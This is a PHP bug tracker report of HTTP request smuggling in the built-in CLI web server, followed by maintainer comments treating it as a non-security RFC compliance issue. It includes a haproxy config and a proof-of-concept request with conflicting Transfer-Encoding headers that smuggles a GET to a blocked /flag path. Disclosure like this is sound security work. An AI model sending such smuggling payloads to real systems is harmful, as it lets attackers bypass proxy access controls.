|  support |  documentation |  report a bug |  advanced search |  search howto |  statistics |  random bug |  login
Bug #80043 HTTP Request Smuggling in php webserver
Submitted: 2020-09-01 07:09 UTC Modified: 2021-11-15 15:42 UTC
Avg. Score:5.0 ± 0.0
Reproduced:1 of 1 (100.0%)
Same Version:1 (100.0%)
Same OS:1 (100.0%)
From: kn0wns1c at gmail dot com Assigned:
Status: Open Package: Built-in web server
PHP Version: master-Git-2020-09-01 (Git) OS:
Private report: No CVE-ID: None
Have you experienced this issue?
Rate the importance of this bug to you:

 [2020-09-01 07:09 UTC] kn0wns1c at gmail dot com
functions php_http_parser_execute in sapi\cli\php_http_parser.c parse http request. when I send to two Transfer-Encoding header, one true one false, in one http request, it will thouth that is a legal request. a attacker may use this feature make a HTTP Request Smuggling attack.

for example, using haproxy to make CL-TE attack:

haproxy 1.5.3 version haproxy.cfg
haproxy.cfg forbid access /flag URI

 maxconn 256

 mode http
 timeout connect 5000ms
 timeout client 50000ms
 timeout server 50000ms

frontend http-in
 bind *:80
 default_backend servers
 acl url_403 path_beg -i /flag
 http-request deny if url_403

backend servers
 server server1 maxconn 32

run php webserver

php -S

use this http request can bypass haproxy /flag restrict

Transfer-Encoding: chunked
Transfer-Encoding: chunked-false
Content-Length: 50


GET /flag HTTP/1.1



Add a Patch

Pull Requests

Add a Pull Request


AllCommentsChangesGit/SVN commitsRelated reports
 [2020-09-01 07:12 UTC]
-Type: Security +Type: Bug
 [2020-09-01 07:12 UTC]
PHP CLI server is a debug feature and as such bugs in it are not security issues. See
 [2021-11-15 15:42 UTC]
> Transfer-Encoding: chunked-false

According to RFC 7230, section 3.3.1[1], the built-in Webserver
should respond with 501 (Not implemented), since it doesn't
support this tranfer coding.  However, such faked values are a
very minor problem here.  The bigger problem is that the built-in
Webserver does not even understand generally know values, such as

  Transfer-Encoding: gzip, chunked

but does not reply with 501 either.  The only understood
Transfer-Encoding value is `chunked`.  We may consider to change
this to doc problem.

[1] <>
PHP Copyright © 2001-2024 The PHP Group
All rights reserved.
Last updated: Fri Jun 21 12:01:29 2024 UTC